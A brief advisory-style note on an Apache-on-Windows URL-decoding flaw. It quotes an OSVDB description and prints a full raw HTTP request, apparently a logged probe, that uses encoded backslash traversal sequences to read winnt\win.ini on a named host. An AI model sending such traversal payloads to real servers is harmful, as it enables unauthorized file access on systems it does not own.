Apache on Windows
URL decoding error
Unauthorized file access
OSVDB
From the OSVDB page:
Apache Win32 contains a flaw that allows a remote attacker to access arbitrary files and execute arbitrary binaries outside of the web path. The issue is due to the server not properly sanitizing user input, specifically encoded traversal style attacks (../../) supplied via the URI.
GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1 Host: www.i-pi.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040114 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive